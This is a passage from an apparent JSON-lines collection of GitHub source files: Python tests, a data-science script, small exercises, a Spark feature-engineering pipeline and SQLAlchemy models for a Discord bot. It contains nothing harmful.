TouristGuide(\"\").get_anecdote(ex_oc_coordinates, matches)\n \n assert actual_anecdote == TestTouristGuide.NO_ANECDOTE\n\n @pytest.mark.trgd3a\n def test_if_get_address_retrieves_the_correct_address_of_the_point_of_interest(self):\n\n actual_message = TouristGuide(\"\").get_address(\"sacré coeur\", \"\") #redondant\n\n expected_message = \"Bien sûr mon poussin ! La voici : \\\"35 Rue du Chevalier de \"\\\n \"la Barre, 75018 Paris\\\".
Et voilà une carte pour t'aider en plus !!
\"\n\n assert actual_message == expected_message\n\n @pytest.mark.trgd3b\n def test_if_get_address_reacts_to_an_error_accordingly(self):\n\n actual_message = TouristGuide(\"\").get_address(\"enfer je sais pas moi\", \"\") #redondant\n\n expected_message = \"Désolé, je n'ai pas d'adresse pour ce lieu... 😞\"\n\n assert actual_message == expected_message\n\n ","repo_name":"Ludophilia/P7v2","sub_path":"app/tests/backend/test_tourist_guide.py","file_name":"test_tourist_guide.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37144255894","text":"#\n#\n#\n#\nPROG='''\nPlotBL_Hyp3InSAR : plot baseline network from folder of Hyp3/Gamma Zip/InSAR \n but extracted {GAMMA_INSAR_PRODUCT}.txt\nPhisan.Chula@gmail.com ( Faculty of Engineering, Chulalongkorn University )\nIntial : 15 January 2022\n'''\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nimport datetime as dt\nfrom collections import Counter\nimport sys, yaml\nfrom PlotNetworkBL import *\n\n############################################################\nclass InSAR_Baseline_Hyp3SDK( InSAR_Baseline ):\n def __init__( self, FOLDER ):\n #import pdb; pdb.set_trace()\n self.FOLDER=FOLDER\n df_ifg = pd.DataFrame( FOLDER.glob( '*.txt'), columns=['Hyp3Path'] )\n df_ifg[['PROD', 'dt_master','dt_slave', 'scene_master','scene_slave',\n 'Bperp_m', 'Btemp_d' ] ] = df_ifg.apply( self.ParseIfgProduct , \n axis='columns', result_type='expand' )\n ####################################\n grs = list( set( list(df_ifg.scene_master)+list(df_ifg.scene_slave)) )\n df_ref = pd.DataFrame( grs , columns=['Granule'] )\n df_ref['PROD'] = df_ref.Granule.str[-4:]\n def ParseGranule(row):\n S1,_,_,_,_,dtacq,_,_,_,NAME4 = row.Granule.split('_') \n return dt.datetime.strptime( dtacq, '%Y%m%dT%H%M%S' )\n df_ref['dtAcq'] = df_ref.apply( ParseGranule , axis='columns' )\n df_ref.sort_values(by='dtAcq',ascending=False,inplace=True,ignore_index=True)\n #import pdb; pdb.set_trace()\n df_ref['Btemp0_d'] = (df_ref['dtAcq']-df_ref.iloc[0]['dtAcq']).dt.days\n self.df_ifg = df_ifg; self.df_ref = df_ref\n self.SolveBaselineRef()\n super().__init__()\n\n def ParseIfgProduct(self, row):\n S1,dtms,dtsl,VVP,_,_,_,NAME4 = row['Hyp3Path'].stem.split('_')\n day_sep = int(VVP[-3:]) # only + !!!\n dtms = dt.datetime.strptime( dtms, '%Y%m%dT%H%M%S' )\n dtsl = dt.datetime.strptime( dtsl, '%Y%m%dT%H%M%S' )\n day_diff = (dtsl-dtms).days\n with open( row.Hyp3Path ) as f:\n YAML = yaml.load( f, Loader=yaml.FullLoader )\n return (NAME4, dtms, dtsl, YAML['Reference Granule'], YAML['Secondary Granule'],\n YAML['Baseline'], day_diff )\n\n def SolveBaselineRef(self):\n N = len(self.df_ref)\n mtx = list(); rhs = list()\n mtxrow = N*[0]; mtxrow[0]=+1; mtx.append( mtxrow ) # latest acq - reference\n rhs.append( 0.0 ) # refence ganule\n for i,row in self.df_ifg.iterrows():\n mtxrow = N*[0]\n idx_fr = self.df_ref[ self.df_ref['Granule']==row.scene_master ].index[0]\n idx_to = self.df_ref[ self.df_ref['Granule']==row.scene_slave ].index[0]\n mtxrow[idx_fr] = -1\n mtxrow[idx_to] = +1\n mtx.append( mtxrow )\n rhs.append( row.Bperp_m )\n #print( mtxrow )\n A = np.array(mtx)\n B = np.array(rhs).T\n res = np.linalg.lstsq(A,B,rcond=-1)\n if res[1]>1: raise f\"Waning residual {res[1]} is too large !!!!\"\n self.df_ref['Bperp0_m'] = np.round( res[0], 1)\n #import pdb; pdb.set_trace()\n 
return\n\n############################################################\n#FOLDER = Path( 'Prepare/ASC_CMI_PYO_2021' )\nFOLDER = Path( 'Prepare/DES_CMI_PYO_2021' )\n\nif len(sys.argv)==2:\n    FOLDER = sys.argv[1]\n    bl = InSAR_Baseline_Hyp3SDK( Path(FOLDER) )\nelse:\n    print(PROG)\n    print('Usage: PlotBL_InSAR <FOLDER>')\n"}{"text":"class GuessNumber:\n    def __init__(self, number, min, max) -> None:\n        super().__init__()\n        self.number = number\n        self.guesses = 0\n        self.min = min\n        self.max = max\n\n    def get_guess(self):\n        guess = input(\"Please guess the number (between 0-100)\")\n\n        if self.valid_number(guess):\n            return int(guess)\n        print(\"Please enter a valid number.\")\n        return self.get_guess()\n\n    def valid_number(self, str_number):\n        # return False or True\n        # check the condition 1\n        try:\n            # convert string to number\n            # alphabet > cause the error\n            number = int(str_number)\n        except:\n            # go to this one\n            return False\n        # check the condition 2\n        return self.min < number < self.max\n\n    def play(self):\n        while True:\n            self.guesses += 1\n\n            guess = self.get_guess()\n\n            print(\"Guess\")\n\n            if guess < self.number:\n                print(\"Your guess was under.\")\n            elif guess > self.number:\n                print(\"Your guess was over.\")\n            else:\n                break\n        print(\"Done\")\n\n\ngame = GuessNumber(25, 4, 100)\ngame.play()\n","repo_name":"leviethung2103/SoftwareDesign","sub_path":"Basic/example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}{"seq_id":"37366611359","text":"'''\nA serializer for the DataPoint EEG representation\nthat allows transfer to the JSON format from our model\n\nLast edited by\nName: Nick Velicer\nDate: 11/19\n'''\n\nfrom rest_framework import serializers\nfrom api.models import DataPoint, EEGData\n\n\nclass DataPointSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = DataPoint\n        fields = ['id', \n        'idNum', \n        'ch1',\n        'ch2',\n        'ch3',\n        'ch4',\n        'ch5',\n        'ch6',\n        'ch7',\n        'ch8',\n        'ch9',\n        'ch10',\n        'ch11',\n        'ch12',\n        'ch13',\n        'ch14']\n\nclass FileUploadSerializer(serializers.Serializer):\n    \"\"\"\n    Serializer to transfer the file to the backend.\n    \"\"\"\n    file = serializers.FileField()\n\nclass SaveFileSerializer(serializers.Serializer):\n    \"\"\"\n    Each row of data from the csv will go through this \n    serializer and validate it has all the right values.\n    \"\"\"\n    class Meta:\n        model = EEGData\n        fields = \"__all__\"","repo_name":"Nick-Velicer/SoundField","sub_path":"backend/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}{"seq_id":"43144473120","text":"# idea : https://leetcode.com/problems/longest-nice-subarray/discuss/2527357/Sliding-window-O(n)-or-Fully-Explained\n\nclass Solution:\n    def longestNiceSubarray(self, nums: List[int]) -> int:\n        cur_num = nums[0]\n        longest = 1\n        l = 0\n        \n        for r in range(1, len(nums)):\n            while l != r and nums[r] & cur_num != 0: # because every pair must have AND == 0\n                cur_num -= nums[l]\n                l += 1\n            \n            longest = max(longest, r - l + 1)\n            cur_num += nums[r] # using OR to consider all elements in subarray\n        \n        \n        return longest","repo_name":"hardik302001/leetcode","sub_path":"problems/longest_nice_subarray/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}{"seq_id":"10009502283","text":"import pytest\nfrom tests.metaschema.datatypes.test_MetaschemaType import (\n 
TestMetaschemaType as base_class)\nfrom yggdrasil.metaschema.datatypes.FunctionMetaschemaType import example_func\n\n\nclass TestFunctionMetaschemaType(base_class):\n r\"\"\"Test class for FunctionMetaschemaType class with float.\"\"\"\n\n _mod = 'yggdrasil.metaschema.datatypes.FunctionMetaschemaType'\n _cls = 'FunctionMetaschemaType'\n\n @pytest.fixture(scope=\"class\")\n def value(self):\n r\"\"\"function: Test function.\"\"\"\n return example_func\n \n @pytest.fixture(scope=\"class\")\n def valid_encoded(self, python_class, typedef_base):\n r\"\"\"list: Encoded objects that are valid under this type.\"\"\"\n return [dict(typedef_base,\n type=python_class.name)]\n \n @pytest.fixture(scope=\"class\")\n def valid_decoded(self, value):\n r\"\"\"list: Objects that are valid under this type.\"\"\"\n return [value]\n \n @pytest.fixture(scope=\"class\")\n def invalid_decoded(self):\n r\"\"\"list: Objects that are invalid under this type.\"\"\"\n return [object]\n\n @pytest.fixture(scope=\"class\")\n def compatible_objects(self, value):\n r\"\"\"list: Objects that are compatible with this type.\"\"\"\n return [(value, value, None)]\n\n @pytest.fixture(scope=\"class\")\n def valid_normalize(self):\n r\"\"\"list: Pairs of pre-/post-normalized objects.\"\"\"\n return [(None, None),\n ('yggdrasil.metaschema.datatypes.FunctionMetaschemaType'\n ':example_func', example_func)]\n\n def test_decode_data_errors(self, python_class):\n r\"\"\"Test errors in decode_data.\"\"\"\n with pytest.raises(ValueError):\n python_class.decode_data('hello', None)\n with pytest.raises(AttributeError):\n python_class.decode_data('yggdrasil:invalid', None)\n","repo_name":"chrishavlin/yggdrasil","sub_path":"tests/metaschema/datatypes/test_FunctionMetaschemaType.py","file_name":"test_FunctionMetaschemaType.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"6309235127","text":"import csv\n\ngamma = {}\nbigram_freq = {}\npreds = {}\nsuccs = {}\n\nwith open('School/Capstone/ngrams_words_3.txt', newline='') as lines:\n reader = csv.reader(lines, delimiter = '\\t')\n for line in reader:\n line = ' '.join(line)\n line = line.lower().split(' ')\n #print(line[1:4])\n gamma[line[1]] = gamma.get(line[1], 0) + 1\n gamma[line[2]] = gamma.get(line[2], 0) + 1\n gamma[line[3]] = gamma.get(line[3], 0) + 1\n if line[2] not in preds:\n preds[line[2]] = [line[1]]\n else:\n preds[line[2]].append(line[1])\n\n if line[2] not in succs:\n succs[line[2]] = [line[3]]\n else:\n succs[line[2]].append(line[3])\n\n bigram_freq[line[1] + ' ' + line[2]] = bigram_freq.get(line[1] + ' ' + line[2], 0) + int(line[0])\n bigram_freq[line[2] + ' ' + line[3]] = bigram_freq.get(line[2] + ' ' + line[3], 0) + int(line[0])\n\n#print(gamma)\nprint(bigram_freq)\n#print(preds)\n#print(succs)","repo_name":"birdas/Capstone","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28381013303","text":"import logging\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef logger_raise_warn_exception(error_post_data, exception_type, detail):\n logger.warning(f'{detail}')\n logger.warning(error_post_data)\n raise exception_type(detail=detail)\n\ndef logger_info(*args):\n for info in args:\n 
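        # *args accepts any number of positional values; each one becomes its own log\n        # record, e.g. (hypothetical call): logger_info('job started', {'rows': 42})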
logger.info(info)\n","repo_name":"giaphiendev/base_django","sub_path":"django_app/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8827626575","text":"from po.base_page import BasePage\nfrom utils.file_handle import FileHandle\n\n\nclass UserInfoPage(BasePage):\n\n URL = \"http://testingedu.com.cn:8000/Home/User/info.html\"\n PRIVIEW_IMG = 'preview'\n AVTAR_IFRAME1 = '//*[@id=\"layui-layer-iframe1\"]'\n FILE_INPUT = '//*[@id=\"filePicker\"]/div[2]/input'\n FILE_UPLOAD_SUC_TXT = '//span[text()=\"100%\"]'\n FILE_SAVE_BTN = '//div[@class=\"saveBtn\"]'\n RE_UPLOAD = '//a[text()=\"重新上传\"]'\n CONFIRM_BTN = '//*[@value=\"确认保存\"]'\n\n\n data_file_path = FileHandle.absolute_path('','images.jpeg')\n\n def upload_avtar(self,file_path=data_file_path):\n self.get_url(self.URL)\n self.click_js(self.PRIVIEW_IMG)\n self.wait_until(self.AVTAR_IFRAME1,10)\n\n self.into_iframe(self.AVTAR_IFRAME1)\n self.input(self.FILE_INPUT,file_path)\n \n def expect_upload_suc(self):\n self.wait_until(self.FILE_SAVE_BTN,10)\n\n def save_upload(self):\n self.click(self.FILE_SAVE_BTN)\n self.out_to_iframe()\n self.click(self.CONFIRM_BTN)\n\n def expect_upload_fail(self,timeout=10):\n self.wait_until(self.RE_UPLOAD,timeout)\n\n\n\n","repo_name":"candice0430/mall_ui_test","sub_path":"po/UserInfoPage.py","file_name":"UserInfoPage.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25055479290","text":"def remove_junk(text):\r\n for junk_char in \" -\":\r\n new_text = text.replace(junk_char, '')\r\n return new_text\r\n\r\ndef transform_into_words(number):\r\n dict_n = {0: \"\", 1: \"One\", 2: \"Two\", 3: \"Three\", 4: \"Four\", 5: \"Five\", \\\r\n 6: \"Six\", 7: \"Seven\", 8: \"Eight\", 9: \"Nine\", 10: \"Ten\", \\\r\n 11: \"Eleven\", 12: \"Twelve\", 13: \"Thirteen\", 14: \"Fourteen\", \\\r\n 15: \"Fifteen\", 16: \"Sixteen\", 17: \"Seventeen\", 18: \"Eighteen\", 19: \"Nineteen\"}\r\n dict_n2 = [\"Twenty\", \"Thirty\", \"Forty\", \"Fifty\", \"Sixty\", \"Seventy\", \"Eighty\", \"Ninety\"]\r\n\r\n number_str = str(number)\r\n if len(number_str) > 3:\r\n thousends = number_str[-4]\r\n else:\r\n thousends = 0\r\n if len(number_str) > 2:\r\n houndreds = number_str[-3]\r\n else:\r\n houndreds = 0\r\n if len(number_str) > 1:\r\n tens = number_str[-2]\r\n else:\r\n tens = '0'\r\n digits = number_str[-1]\r\n\r\n number_in_words = \"\"\r\n if int(thousends):\r\n number_in_words += dict_n[int(thousends)] + \"thousand\"\r\n if int(houndreds):\r\n number_in_words += dict_n[int(houndreds)] + \"hundred\"\r\n if (int(houndreds) or int(thousends)) and (int(digits) or int(tens)):\r\n number_in_words += \"and\"\r\n if tens >= '2':\r\n number_in_words += dict_n2[int(tens) - 2]\r\n if int(digits):\r\n number_in_words+= \"-\"\r\n number_in_words += dict_n[int(digits)]\r\n elif tens >= '1':\r\n number_in_words += dict_n[int(digits) + 10]\r\n else:\r\n number_in_words += dict_n[int(digits)]\r\n \r\n return number_in_words\r\n\r\nsum = 0\r\n\r\n#print(transform_into_words(4021))\r\n\r\nf = open(\"D:\\\\numbers to letters.txt\", 'w')\r\n\r\nfor i in range(1, 1000 + 1):\r\n number_str = remove_junk(transform_into_words(i))\r\n f.write(number_str)\r\n f.write(\"\\n\")\r\n sum += 
len(number_str)\r\n\r\nf.close()\r\n\r\n\r\nprint(sum)\r\n\r\n\r\n","repo_name":"ATEUCT800/Eiler-Project","sub_path":"17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23448855391","text":"# -*- coding: utf-8 -*-\nimport sys\n\ndef calcInvite(max_level, audience):\n surplus = 0\n invite = 0\n for i in xrange(max_level+1):\n if audience[i] == 0:\n if surplus > 0:\n surplus -= 1\n else:\n invite += 1\n else:\n surplus += audience[i] - 1\n\n return invite\n\nif __name__ == \"__main__\":\n f = open(sys.argv[1], 'r')\n test_num = int(f.readline())\n\n for i in xrange(1, test_num+1):\n line = f.readline().split()\n ans = calcInvite(int(line[0]), map(int, line[1]))\n print('Case #%i: %s' % (i, ans) )\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/137.py","file_name":"137.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3414795187","text":"import re\nimport ast\nimport time\nimport itertools\nimport pyspark\nimport numpy as np\nfrom numpy import allclose\nimport pandas as pd\n#import matplotlib.pyplot as plt\nfrom pyspark.sql import Row\nfrom pyspark.sql import SQLContext\nimport pyspark.sql.functions as F\nfrom pyspark.ml.feature import StandardScaler\nfrom pyspark.sql.functions import *\nfrom pyspark.ml.classification import RandomForestClassifier\nfrom pyspark.ml.feature import StringIndexer, OneHotEncoderEstimator, VectorAssembler, VectorSlicer\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.evaluation import BinaryClassificationEvaluator\nfrom pyspark.ml.linalg import Vectors\nfrom pyspark.ml.feature import Imputer\nfrom pyspark.ml.tuning import ParamGridBuilder, TrainValidationSplit\n\n# start Spark Session (RUN THIS CELL AS IS)\nfrom pyspark.sql import SparkSession\nsc = pyspark.SparkContext()\nsqlContext = SQLContext(sc)\n\nrawTrainRDD = sc.textFile('gs://w261-tktruong/data/train.txt')\ntrainRDD, devRDD, testRDD = rawTrainRDD.randomSplit([0.8,0.1, 0.1], seed = 2018)\nedaRDD, otherRDD = trainRDD.randomSplit([0.0003, 0.9997], seed = 2018)\n\n#tenK_raw = ast.literal_eval(open(\"gs://w261-tktruong/eda.txt\", \"r\").read())\n\ndef parse_raw_row(row):\n '''\n for each row in the raw data, output is a list of label and all the features:\n - [label, feature_1, feature_1, ...]\n For first 13 features, change the data type to number.\n Remaining features will of type string.\n For null values, populate None\n '''\n \n row_values = row.split('\\t')\n for i, value in enumerate(row_values):\n if i <14:\n row_values[i] = float(value) if value != '' else None\n else:\n row_values[i] = value if value != '' else None\n # \"''\"\n return row_values\n\n# Calculate click through rate frequency count of each category\n\ndef BinCategoricalFeatures(tenK_df4):\n '''\n takes a spark df with numerical and categorical columns\n outputs a spark df where all the categorical features are binned using custom logic\n '''\n exclude_list = ['_20', '_31', '_37']\n\n tenK_click_df = tenK_df4\n for n,i in enumerate(tenK_df4.dtypes):\n\n if i[1]=='string':\n\n feature = i[0]\n\n # frequency count of unique categories under each feature\n cat_freqDF = tenK_df4.groupBy(feature).count()\n\n # click through frequency count: count of 'label = 1' for each category\n click_freqDF = tenK_df4.where(\"_1 == 1\").groupBy(feature, \"_1\").count()\n\n\n ## Calculate 
click through frequency ratio for each category:\n            ##(count of 'label = 1'/total count)\n\n            df1 = click_freqDF.alias('df1')\n            df2 = cat_freqDF.alias('df2')\n            if n == 0:\n                df3 = tenK_df4.alias('df3')\n            else:\n                df3 = tenK_click_df.alias('df3')\n\n            tenK_click_df = df1.join(df2, [feature]).join(df3, [feature]).select(feature, 'df3.*',\n                                (df1['count']/df2['count']).alias(feature+\"_click\"))\n\n            ## End of click through frequency ratio calculation\n\n            ###### Bin data into binary bins based on the click through rate (ctr).\n\n            if i[0] not in exclude_list:\n\n                # if ctr == 0, value = A\n                # else value = B\n                # Keep null values as they are\n                tenK_click_df = tenK_click_df.withColumn(feature,\n                                 F.when(tenK_click_df[feature+'_click'] == 0, F.lit(\"A\"))\n                                 .otherwise(F.lit(\"B\")))\n\n\n            elif i[0] in ['_20', '_31']:\n\n                max_ctr = tenK_click_df.agg({feature+\"_click\": \"max\"}).collect()[0][0]\n                ctr_threshold = max_ctr/2\n\n                # if ctr == 0, value = A\n                # if ctr > 0 and <= threshold, value = B\n                # else value = C\n                # Keep null values as they are\n                tenK_click_df = tenK_click_df.withColumn(feature,\n                                F.when(tenK_click_df[feature+'_click'] == 0, F.lit(\"A\"))\n                                .otherwise(\n                                F.when((tenK_click_df[feature+'_click'] < ctr_threshold)|(tenK_click_df[feature+'_click'] == ctr_threshold)\n                                       , F.lit(\"B\"))\n                                .otherwise(F.lit(\"C\"))))\n\n            elif i[0] == '_37':\n\n                max_ctr = tenK_click_df.agg({feature+\"_click\": \"max\"}).collect()[0][0]\n                ctr_threshold1 = max_ctr/3\n                ctr_threshold2 = 2*ctr_threshold1\n\n                # if ctr == 0, value = A\n                # if ctr > 0 and <= threshold1, value = B\n                # if ctr > threshold1 and <= threshold2, value = C\n                # else value = D\n                # Keep null values as they are\n\n                tenK_click_df = tenK_click_df.withColumn(feature,\n                                F.when(tenK_click_df[feature+'_click'] == 0, F.lit(\"A\"))\n                                .otherwise(\n                                F.when(((tenK_click_df[feature+'_click'] > 0)\n                                & ((tenK_click_df[feature+'_click'] < ctr_threshold1) | (tenK_click_df[feature+'_click'] == ctr_threshold1)))\n                                , F.lit(\"B\"))\n                                .otherwise(\n                                F.when(((tenK_click_df[feature+'_click'] > ctr_threshold1)\n                                & ((tenK_click_df[feature+'_click'] < ctr_threshold2) | (tenK_click_df[feature+'_click'] == ctr_threshold2)))\n                                , F.lit(\"C\"))\n                                .otherwise(F.lit(\"D\")))))\n\n    tenK_df5 = tenK_click_df.drop('_15_click','_16_click','_19_click','_22_click','_25_click','_27_click',\n                                  '_28_click','_29_click', '_31_click', '_32_click', '_37_click', '_38_click'\n                                  ,'_20_click','_23_click','_31_click', '_37_click')\n\n    tenK_df5.cache()\n    return tenK_df5\n\n# FeatureScore calculation using RandomForest Ensembling\n\ndef CalFeatureScore(tenK_df5):\n    '''\n    Takes input as a Spark DataFrame.\n    Fit and transform using Assembler Pipeline\n    Run RandomForestClassifier to output top performing 30 features\n    '''\n\n    def ExtractFeatureImp(featureImp, dataset, featuresCol):\n        '''\n        Function to display featureImportances in human readable format\n        '''\n        list_extract = []\n        for i in dataset.schema[featuresCol].metadata[\"ml_attr\"][\"attrs\"]:\n            list_extract = list_extract + dataset.schema[featuresCol].metadata[\"ml_attr\"][\"attrs\"][i]\n        varlist = pd.DataFrame(list_extract)\n        varlist['score'] = varlist['idx'].apply(lambda x: featureImp[x])\n        return(varlist.sort_values('score', ascending = False))\n\n\n    encoding_var = [i[0] for i in tenK_df5.dtypes if (i[1]=='string')]\n    num_var = [i[0] for i in tenK_df5.dtypes if (i[1]!='string') & (i[0]!= '_1')]\n\n    string_indexes = [StringIndexer(inputCol = c, outputCol = 'IDX_' + c, handleInvalid = 'keep')\n                      for c in encoding_var]\n    onehot_indexes = 
[OneHotEncoderEstimator(inputCols = ['IDX_' + c], outputCols = ['OHE_' + c])\n for c in encoding_var]\n label_indexes = StringIndexer(inputCol = '_1', outputCol = 'label', handleInvalid = 'keep')\n assembler = VectorAssembler(inputCols = num_var + ['OHE_' + c for c in encoding_var]\n , outputCol = \"features\")\n rf = RandomForestClassifier(labelCol=\"label\", featuresCol=\"features\", seed = 8464,\n numTrees=10, cacheNodeIds = True, subsamplingRate = 0.7)\n\n pipe = Pipeline(stages = string_indexes + onehot_indexes + [assembler, label_indexes, rf])\n\n ## fit into pipe\n\n mod = pipe.fit(tenK_df5)\n tenK_df6 = mod.transform(tenK_df5)\n\n varlist = ExtractFeatureImp(mod.stages[-1].featureImportances, tenK_df6, \"features\")\n top_features = [x for x in varlist['name'][0:30]]\n\n return top_features\n\n#Create data frame with one-hot encoding for categorical variables\n\ndef one_hot_encode(tenK_df5, top_features):\n '''\n Create data frame with one-hot encoding for categorical variables\n Take input as Spark Data Frame\n Output Spark DataFrame with hot-encoding\n '''\n\n one_hot = tenK_df5.toPandas()\n encoding_var = [i[0] for i in tenK_df5.dtypes if (i[1]=='string')]\n for col in encoding_var:\n one_hot_pd = pd.concat([one_hot,pd.get_dummies(one_hot[col], prefix='OHE_'+col,dummy_na=False)],axis=1).drop([col],axis=1)\n one_hot = one_hot_pd\n\n one_hot_df = sqlContext.createDataFrame(one_hot_pd)\n\n ###Keep the columns recommended by RandomForestClassifier\n\n curr_col = one_hot_df.columns\n col_to_drop = [x for x in curr_col if x not in top_features and x != '_1']\n\n tenK_df7 = one_hot_df\n for col in col_to_drop:\n tenK_df7 = tenK_df7.drop(col)\n\n return tenK_df7\n\n# use average imputer for null values\n\ndef imputeNumeric(numeric_DF):\n '''\n takes a spark df with continuous numeric columns\n outputs a spark df where all null values are replaced with the column average\n\n the first column, which is the outcome values, are preserved\n '''\n outputColumns=[\"{}\".format(c) for c in numeric_DF.columns[1:11]]\n catColumns = [\"{}\".format(c) for c in numeric_DF.columns[11:]]\n\n imputer = Imputer(\n inputCols=numeric_DF.columns[1:11],\n outputCols=[\"{}\".format(c) for c in numeric_DF.columns[1:11]]\n )\n\n model = imputer.fit(numeric_DF)\n\n imputedDF = model.transform(numeric_DF).select(['_1']+outputColumns+catColumns)\n\n return imputedDF\n\ndef scaleFeatures(inputedDF):\n '''\n inputs imputed data frame with no null values and continuous features\n transforms the data frame into 2 column data frame with first column as label and second column as dense vector of features\n scales all features using the StandardScalar\n returns 2 column dataframe with scaled features\n '''\n\n transformedImputedDF = inputedDF.rdd.map(lambda x: (x[0], Vectors.dense(x[1:11]))).toDF(['label', 'x'])\n\n\n scaler = StandardScaler(inputCol=\"x\",\n outputCol=\"features\",\n withStd=True, withMean=True)\n\n scalerModel = scaler.fit(transformedImputedDF)\n scaledDF = scalerModel.transform(transformedImputedDF).select(['label', 'features'])\n\n return scaledDF\n\n\n# parse raw 10k sample data to form tenKRDD\n#tenKRDD = sc.textFile(\"gs://w261-tktruong/eda.txt\").map(parse_raw_row).cache()\n\n#### Create SQL dataframe from RDD\nparsed_eda = edaRDD.map(parse_raw_row).cache()\n# for 10K sample data\ntenKfeature_df = sqlContext.createDataFrame(parsed_eda)\n\n# drop features with high unknown values\n\ntenK_df1 = tenKfeature_df.drop('_13','_36','_2','_11','_33','_34','_39','_40')\n\n#tenK_df1.show(1)\n\ntenK_df2 = 
tenK_df1.drop('_17','_18','_21','_24','_26','_30','_35')\n#tenK_df2.show(5)\n\n##Replace null with mean for numerical features\n\ntenK_df4 = imputeNumeric(tenK_df2)\ntenK_df4.cache()\n#tenK_df4.show(1,False)\n\n#### Customize binning for categorical features\n\ntenK_df5 = BinCategoricalFeatures(tenK_df4)\n#tenK_df5.show(20,False)\n\n### Call RandomForest Classifier to retrieve top performing features\ntop_features = CalFeatureScore(tenK_df5)\nprint(top_features)\n\n### Call one-hot encoding\n\ntenK_df7 = one_hot_encode(tenK_df5, top_features)\n#tenK_df7.show(5, False)\n\n### Build separate RDD for Categorical columns\n\ncatDF = tenK_df7.select([c for c in tenK_df7.columns if 'OHE' in c ])\ncatRDD = catDF.rdd\n#catRDD.take(5)\n\n### Build separate RDD for Categorical columns\n\n### Standardize numerical column and Build separate RDD for Numerical columns\n\nnumericDF = scaleFeatures(tenK_df7)\nnumRDD = numericDF.rdd\n#numRDD.take(5)\n\n### Combine both the RDD-s to build full data RDD\nFullDataRDD = numRDD.zip(catRDD)\n\nFullDataRDD1 = FullDataRDD.map(lambda x: (x[0][0], np.array(x[0][1]), np.array(x[1])))\\\n .map(lambda x: (x[0], np.append(x[1], x[2])))\n\nFullDataRDD2 = FullDataRDD1.map(lambda x: (x[0],Vectors.dense(x[1])))\n\nprint(FullDataRDD1.take(5))\n\nprint(FullDataRDD2.take(5))\n","repo_name":"debalina-m/CTR_Prediction_large_scale","sub_path":"development_files/Pre-proc-n-FeatureExtraction.py","file_name":"Pre-proc-n-FeatureExtraction.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24491962014","text":"from sqlalchemy import create_engine, Column, Integer, String, Text, Date, select, insert, update\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.sql.expression import func, select\n\nimport time\nimport datetime\n\nengine = create_engine('sqlite+pysqlite:///people.db')\nBase = declarative_base()\n\n# Setup tables\nclass People(Base):\n __tablename__ = 'people'\n id = Column(Text, primary_key=True)\n person_name = Column(Text)\n count = Column(Integer, default=0)\n\nclass Reminder(Base):\n __tablename__ = 'reminders'\n id = Column(Integer, primary_key=True, autoincrement=True)\n discord_id = Column(Integer)\n reminder_time = Column(Integer)\n status = Column(Text, default='pending')\n channel = Column(Integer)\n reminder_message = Column(Text)\n\nclass Bait(Base):\n __tablename__ = 'bait'\n id = Column(Integer, primary_key=True, autoincrement=True)\n title = Column(String, default='Title')\n description = Column(String, default='Description')\n url = Column(String, default='https://cdn.discordapp.com/attachments/572464049179328532/572639933139779594/Shounen_Time.png')\n message = Column(String)\n\nclass Quote(Base):\n __tablename__ = 'quotes'\n id = Column(Integer, primary_key=True, autoincrement=True)\n quote = Column(Text, unique=True)\n author = Column(Text)\n guild_id = Column(Integer, default=None)\n created_at = Column(Date, default=func.now())\n\nclass Image(Base):\n __tablename__ = 'images'\n id = Column(Integer, primary_key=True, autoincrement=True)\n url = Column(String, unique=True)\n guild_id = Column(Integer, default=None)\n created_at = Column(Date, default=func.now())\n\n\nBase.metadata.create_all(bind=engine)\nSession = sessionmaker(bind = engine)\nsession = Session()\n\n### People ###\ndef people_top():\n stmt = select(People.person_name, People.count).order_by(People.count.desc())\n results = 
